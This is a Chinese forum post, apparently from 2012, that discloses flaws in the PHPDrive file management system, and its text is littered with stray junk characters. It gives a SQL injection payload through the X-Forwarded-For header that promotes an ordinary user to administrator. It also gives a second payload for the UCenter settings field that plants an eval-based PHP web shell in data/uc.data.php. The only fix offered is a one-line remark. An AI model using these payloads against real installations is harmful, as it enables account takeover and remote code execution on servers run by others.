PHPDrive 是一套运行于 PHP 环境的文件管理系统,可以应用于网盘、企业文件管理、学校、团队管理、软件站、文件CMS等
: O9 o% `3 i }! y1 L7 [5 F
" K2 @% c2 a) iincludes/user.lib.php& |& s b- H( Z; X& W
行877 O7 G( l+ B* R* b! K
function get_ip() {2 c' \4 t2 X7 v) n$ R
if(isset($_SERVER["HTTP_X_FORWARDED_FOR"])&&$_SERVER["HTTP_X_FORWARDED_FOR"]) $ip = $_SERVER["HTTP_X_FORWARDED_FOR"];.: `/ m, Q K5 J, \% w1 b- z
在用户注册与登录 处module/disk/account.lead.php
; M! L0 p" k3 y7 q( ]198行
( u6 s' U- h+ g6 [* m //更新本次登录IP和时间 E2 s4 n9 d0 i. L& X
$db->Query(‘UPDATE `’.$db->TPre.’user` SET `before_last_date` = ‘.$UserArr['last_date'].’,`last_date` = ‘.$NowUnixTime.’,`before_last_ip` = “‘.$UserArr['last_ip'].’”,`last_ip` = “‘.get_ip().’” WHERE `uid` = ‘.$UserArr['uid'].’;');//get_ip()入库注入产生, W4 Q* r1 u& k$ ?
由于本套程序user与manager是存在于同一个表下的,只是用group字段来区分两者,group=1为管理员,2则为普通用户。所以可以利用以上注入,将普通用户的group值改为1,即可提升权限( _3 w3 c5 ]0 O4 U, \- R" r- z3 N
实现方法:使用firefox的一款插件x-forwarded-for Header 1.0,将你的IP地址改为123″,`group`=”1然后登陆,这时候你就是管理员了.4 ?* l) }# f. J* s! U
后台getshell:: z# u, k5 H2 J8 r& V/ E2 g" r
在UCenter设置处,将UC数据库登录名填写为1 f/ w' U4 `0 \, v% ~5 V
/ z& A! i' _# ?6 v! U+ E8 D# troot’);eval($_POST[DisKill]);?>/*
" M6 _" I# P f) T可以得到一个shell,位置在 data/uc.data.php& z: K& F4 g+ m P! l0 K7 X
8 Y2 s1 N- e% S: ^8 C4 ?% i9 B
修复:过滤注入2 r5 ?8 @- s" d" b; Q5 j, {5 i
" W) T) |% x' f' q
|
发表于 2012-12-31 09:18:34
收藏
支持
反对